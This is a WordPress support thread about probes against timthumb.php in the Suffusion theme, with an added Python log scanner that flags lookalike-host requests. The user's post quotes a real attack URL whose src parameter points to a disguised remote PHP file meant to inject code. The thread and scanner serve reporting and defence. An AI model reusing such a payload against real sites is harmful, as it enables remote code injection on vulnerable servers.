Title: Security Issue : timthumb.php
Last modified: August 20, 2016

---

# Security Issue : timthumb.php

 *  [ltoinel](https://wordpress.org/support/users/ltoinel/)
 * (@ltoinel)
 * [13 years, 5 months ago](https://wordpress.org/support/topic/security-issue-timthumbphp/)
 * Hi, I don’t use WordPress, however I received some attacks aimed at the
   Suffusion theme:
 * [http://xxxxxxxx/wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php](http://xxxxxxxx/wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php)
 * The attacker seems to use a fake host to inject malicious php code.
 * Cheers !
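
The request quoted in the post above places a well-known image host name at the front of an unrelated domain. The following is an added example, not part of the original thread, that flags such requests in web server access logs by comparing the `src` host against an allowlist as a true domain suffix rather than as a substring. The allowlist, the function names and three of the four sample log lines are assumptions constructed for illustration; the first sample line reuses the URL from the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts the site operator accepts as remote image sources.
TRUSTED_HOSTS = ("img.youtube.com", "flickr.com")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_trusted(host):
    """True only for a trusted host itself or a real subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)

def classify(line):
    """Return None for unrelated log lines, else (verdict, src_host)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("/timthumb.php"):
        return None
    src = parse_qs(target.query).get("src", [""])[0]
    host = urlsplit(src).hostname
    if not host:
        return ("local-src", "")
    if is_trusted(host):
        return ("trusted-remote", host)
    # A trusted name present in the host but not as its suffix is a lookalike.
    if any(t in host.lower() for t in TRUSTED_HOSTS):
        return ("lookalike-host", host)
    return ("untrusted-remote", host)

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2013:10:00:01 +0000] "GET /wp-content/themes/suffusion/timthumb.php?src=http://img.youtube.com.merkezefendi.gov.tr/cilik.php HTTP/1.1" 404 512',
    '198.51.100.4 - - [10/Jan/2013:10:00:05 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg HTTP/1.1" 200 8841',
    '198.51.100.9 - - [10/Jan/2013:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 1024',
    '198.51.100.4 - - [10/Jan/2013:10:00:12 +0000] "GET /wp-content/themes/demo/timthumb.php?src=images/a.jpg HTTP/1.1" 200 300',
]

def scan(lines):
    """Classify every timthumb.php request found in the given log lines."""
    return [verdict for verdict in map(classify, lines) if verdict is not None]

if __name__ == "__main__":
    for verdict, host in scan(SAMPLE_LOG):
        print(f"{verdict:17} {host}")
```

A `lookalike-host` verdict paired with a 404 response, as in the first sample line, matches the situation described in the reply: the probe was sent, but the file it targets is not present.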

Viewing 1 replies (of 1 total)

 *  Theme Author [Sayontan Sinha](https://wordpress.org/support/users/sayontan/)
 * (@sayontan)
 * [13 years, 5 months ago](https://wordpress.org/support/topic/security-issue-timthumbphp/#post-3315588)
 * Suffusion doesn’t have TimThumb. You can verify the source code from the official
   WP repository: [http://themes.svn.wordpress.org/suffusion/4.4.4/](http://themes.svn.wordpress.org/suffusion/4.4.4/).
   The last version of Suffusion to have TimThumb was 3.7.1, which was almost 2 
   years back. In fact I took TimThumb out of Suffusion _6 months before_ the TimThumb
   vulnerability was discovered.
 * Attackers _try_ thousands of random strings in the hopes of injecting malicious
   code, but rest assured that TimThumb is not a part of the Suffusion code. Moreover,
   every theme distributed through [http://wordpress.org/extend/themes/](http://wordpress.org/extend/themes/)
   goes through a review, and TimThumb is not allowed in your code. So there is 
   no theme on this site that has TimThumb in it.

The topic ‘Security Issue : timthumb.php’ is closed to new replies.
